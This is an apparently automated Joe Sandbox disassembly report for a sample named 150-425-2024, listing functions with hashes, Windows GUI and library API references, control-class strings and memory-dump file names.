String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 1268b41098cad00abcba8a05122ce8efafd7f4bebd4ccafb64d4c22cfb502610
Instruction ID: 1ab1c73462a643498a6a4bcce27cd91234b93fe729c11c1682a5a1fc490eb3f2
Opcode Fuzzy Hash: 1268b41098cad00abcba8a05122ce8efafd7f4bebd4ccafb64d4c22cfb502610
Instruction Fuzzy Hash: 58A131752043119FCB00DF24C884E6ABBE5FF89714F15899CF8AA9B2A1CB31ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BE524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BE52DD

Part of subcall function 00BF0340: __87except.LIBCMT ref: 00BF037B

Strings

pow, xrefs: 00BE52B5, 00BE52D2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 9cc4b71fe9075b5b7bf7090a2072005b778c4b317249a3d49e9ee64eefeab7af
Instruction ID: 7ed6ec4122b8845300426be55fba747b25143cf98120e6a6c584d01a3f626751
Opcode Fuzzy Hash: 9cc4b71fe9075b5b7bf7090a2072005b778c4b317249a3d49e9ee64eefeab7af
Instruction Fuzzy Hash: 42517C21A2D74A87CB217725C94137E27E4EB00354F2089D8E696833F7EF748CD89A4A

Uniqueness

Uniqueness Score: -1.00%

Function 00BE023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00BE0280
+, xrefs: 00BE0277

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 15b857d5dc1cd8a6b4cf2fa57f6c8a187d91f0331ccd1dbc3010fb1d0680aa21
Instruction ID: 83473eda468cb3172a4440fdcfdcea543274f9010f084737accfb6754f3b21c0
Opcode Fuzzy Hash: 15b857d5dc1cd8a6b4cf2fa57f6c8a187d91f0331ccd1dbc3010fb1d0680aa21
Instruction Fuzzy Hash: 10511375104286DFCF25EF29D488AF97BE4EF9A310F144095E8A19B2A0D7749EC2DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD63A8
_memmove.LIBCMT ref: 00BD6446
_memset.LIBCMT ref: 00BD646A

Strings

ERCP, xrefs: 00BD6313

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 5f07ddc07a6edc94a0953371ade6f48f264d69f2da02d8bcde4d2947d3a3669b
Instruction ID: 108102f2d2b247956dadf6bb08b0181865069b4c956dc242d1c30aa647654634
Opcode Fuzzy Hash: 5f07ddc07a6edc94a0953371ade6f48f264d69f2da02d8bcde4d2947d3a3669b
Instruction Fuzzy Hash: F1516C719007099BDB24CF65C8857AAFBF4EF04714F2485AEEA4ACA341F775AA85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC65B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?), ref: 00BFC68B

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

ImageList_Remove.COMCTL32(?,?,?), ref: 00BFC6C4
SendMessageW.USER32(?,0000133D,?,00000002), ref: 00BFC792

Strings

@U=u, xrefs: 00BFC68B, 00BFC792

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$ImageList_LongRemoveWindow
String ID: @U=u
API String ID: 558398095-2594219639
Opcode ID: 227ebba965ca7274cbd5fab7306590d47597630888bc894fe8ee4750e68f7db9
Instruction ID: a19f117afbaece13c3bbd4e5be321c3b19bdd8ebc88a524fdf3cbb179627c4cc
Opcode Fuzzy Hash: 227ebba965ca7274cbd5fab7306590d47597630888bc894fe8ee4750e68f7db9
Instruction Fuzzy Hash: 5A416934204249AFC714DF24C594BB9BBE1FF05300F4846EDE99A8B652CB31AD8ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C47648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C476D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C476E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C47708

Strings

SysMonthCal32, xrefs: 00C4769B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 75cd4f088e66d4abefd937c378b0e64ad69fe2b06684d0b434733b6f7de34be3
Instruction ID: 3c2842d339b1a51ee5a374e08d53dbdfb5059c850047719edda77e6bb9c88a5e
Opcode Fuzzy Hash: 75cd4f088e66d4abefd937c378b0e64ad69fe2b06684d0b434733b6f7de34be3
Instruction Fuzzy Hash: B1219F32500219BBDF15CEA4CC46FEA3B79FB48754F110254FE156B1D0DBB1A8519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C46F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C46FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C46FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C46FDF

Strings

Listbox, xrefs: 00C46F77

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 0f41912bee5945cd4c2d4da5e6748ef7128e9817fe85c106d6408ed846682ef4
Instruction ID: 11f84fa5304d61b2cefec156cc5df93e5b361a65d409c4a40c1208ac5a06380a
Opcode Fuzzy Hash: 0f41912bee5945cd4c2d4da5e6748ef7128e9817fe85c106d6408ed846682ef4
Instruction Fuzzy Hash: 63218332610118BFEF118F94DC85FAB37AAFF8A754F018124F9559B190C6719C5687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1912D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C1914F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C19166
SendMessageW.USER32(?,0000000D,?,00000000), ref: 00C1919E

Strings

@U=u, xrefs: 00C1919E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 6bd37e3792c6f7d479ceb28537ad89c619c392efaaa0b310f7774e762a8ba805
Instruction ID: 1ad35ae46e66a09a05a8be98d80f8ad5de8cb72a3817e1a4c1be2e7ee5b73dde
Opcode Fuzzy Hash: 6bd37e3792c6f7d479ceb28537ad89c619c392efaaa0b310f7774e762a8ba805
Instruction Fuzzy Hash: 5C21D731500109BFDF10DB69DC459EEB7FDEF45340F21045AF505E31A0DA71AE819B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C360EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 00C3613B
SendMessageW.USER32(0000000C,00000000,?), ref: 00C3617C
SendMessageW.USER32(0000000C,00000000,?), ref: 00C361A4

Strings

@U=u, xrefs: 00C3613B, 00C3617C, 00C361A4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 4fe4b20967e62f27bc140b30d72aa8b37d1ff7cdbda955799b3967471f699fb9
Instruction ID: d0991e28168ab726d6939d2964a57a9c11e2237b50e726b46cf45631d14c6142
Opcode Fuzzy Hash: 4fe4b20967e62f27bc140b30d72aa8b37d1ff7cdbda955799b3967471f699fb9
Instruction Fuzzy Hash: 8D214735211501AFEB10AB24DD89F2ABBF6FB49310B028098F9199B672CB70BC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C4797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C479E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C479F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C47A03

Strings

msctls_trackbar32, xrefs: 00C479B8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: f15aaa8fb41169cf9a12d3e73de1b54ba2a0d4fda448d0e8a999691312de3831
Instruction ID: 88cc55bd11ca71952225abc4e1d7650747a4df5ae4a0f70a42804a0c8389647d
Opcode Fuzzy Hash: f15aaa8fb41169cf9a12d3e73de1b54ba2a0d4fda448d0e8a999691312de3831
Instruction Fuzzy Hash: A011E332254248BAEF149F74CC05FEB37A9FF89764F024629FA55A6090D371D811DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C46B8F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C46C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C46C20

Strings

edit, xrefs: 00C46BF5
@U=u, xrefs: 00C46C20

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: 25addb403bee6aee134201ff89129cee76adf838546b377de9a131deb28a4164
Instruction ID: d42524f8e868b111168bc4814ac4f79392025fc0f2915af7358f5efa5d17cf26
Opcode Fuzzy Hash: 25addb403bee6aee134201ff89129cee76adf838546b377de9a131deb28a4164
Instruction Fuzzy Hash: 3B119671500208ABEB108E64DC81BEA3BAAFB06368F204728F971D71E4C671DC91AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C192E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C19355

Strings

ListBox, xrefs: 00C1931F
ComboBox, xrefs: 00C192F4
@U=u, xrefs: 00C19355

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 5272b73e93c6edad403af960babb60eef17337639a9d4171c7922e0242a286b4
Instruction ID: c618048bea3d4eb9e2b2cb3b8dc78aa8b4f879f21411e31aa8c089393a4870c4
Opcode Fuzzy Hash: 5272b73e93c6edad403af960babb60eef17337639a9d4171c7922e0242a286b4
Instruction Fuzzy Hash: C301F1B1A41218ABCB04EBA1CCA1DFE73A9FF07320B50065DF832572E1DF316948AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C191DF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C1924D

Strings

ListBox, xrefs: 00C19217
ComboBox, xrefs: 00C191EC
@U=u, xrefs: 00C1924D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 16026fc1a7ba9c3748ff1eeea8b82f233cdc50fe9a2b6bdb00f5e7835520a64a
Instruction ID: 82622070282242f59ec83399d194f1bf7bf1e07ace2ebe190ec5145742933fbe
Opcode Fuzzy Hash: 16026fc1a7ba9c3748ff1eeea8b82f233cdc50fe9a2b6bdb00f5e7835520a64a
Instruction Fuzzy Hash: 9401AC71A411047BCB14E7A0C992EFF73ACDF06340F14016DB51667181DE316F4CA671

Uniqueness

Uniqueness Score: -1.00%

Function 00C19264 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C192D0

Strings

ListBox, xrefs: 00C1929C
ComboBox, xrefs: 00C19271
@U=u, xrefs: 00C192D0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: b9f1a569d13c75095b894ea0eb73efc8151e2eb9c4969e3eedc6cd89dcf5e01d
Instruction ID: d4f045d9285d69033cd2f7dcc04b3c221f48547261f7336bf3cc22bb3940e001
Opcode Fuzzy Hash: b9f1a569d13c75095b894ea0eb73efc8151e2eb9c4969e3eedc6cd89dcf5e01d
Instruction Fuzzy Hash: 4501A2B1A811187BCB14EAA0C992EFF77ECDF16340F240169B81663292DE316F48A671

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AF89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00C867B0,00C4DB17,000000FC,?,00000000,00000000,?,?,?,00BFBBB9,?,?,?,?,?), ref: 00C4AF8B
GetFocus.USER32 ref: 00C4AF93

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

SendMessageW.USER32(0152E770,000000B0,000001BC,000001C0), ref: 00C4B005

Strings

@U=u, xrefs: 00C4B005

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: 5a82a365853a520a1b33e5e09d581084536dbeb5424cdd963c2cbdc48871e43b
Instruction ID: 1ecd290986f89171c279944f33e89751e8fd8bb879d76583521210becb504462
Opcode Fuzzy Hash: 5a82a365853a520a1b33e5e09d581084536dbeb5424cdd963c2cbdc48871e43b
Instruction Fuzzy Hash: FC015E756016009FC7249B38E884BAB77F6FB8A325F18027DE426873A1CB31AD47CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD61C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BD61B1

SendMessageW.USER32(?,0000000C,00000000,?), ref: 00BD61DF
GetParent.USER32(?), ref: 00C1111F
InvalidateRect.USER32(00000000,?,00BD3BAF,?,00000000,00000001), ref: 00C11126

Strings

@U=u, xrefs: 00BD61DF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: a858e3d28d29c2d9ef607271325e240ae2700b086790db823bec7212119e938a
Instruction ID: feec39cf9cdd7f8553a267996fcf75cf180d77d00ee5fa4cc3a87b8637343ca2
Opcode Fuzzy Hash: a858e3d28d29c2d9ef607271325e240ae2700b086790db823bec7212119e938a
Instruction Fuzzy Hash: BFF0A735101204FBEF201F60DC09F95BBA8BB16350F2064BAF54166162D6A65C55AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4C2E), ref: 00BC4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BC4CB5

Strings

kernel32.dll, xrefs: 00BC4C9E
GetNativeSystemInfo, xrefs: 00BC4CAF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
Instruction ID: 2c4abe1d02eb14415449e30a0cced5adebf9dcb4fc9306f4da3b55a9f345cd36
Opcode Fuzzy Hash: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
Instruction Fuzzy Hash: C3D01775910723CFD7209F31DA28B0B76E5FF06791B11887E9886D6160E7B0D8C1CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4CE1,?), ref: 00BC4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BC4DB4

Strings

kernel32.dll, xrefs: 00BC4D9D
Wow64RevertWow64FsRedirection, xrefs: 00BC4DAE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
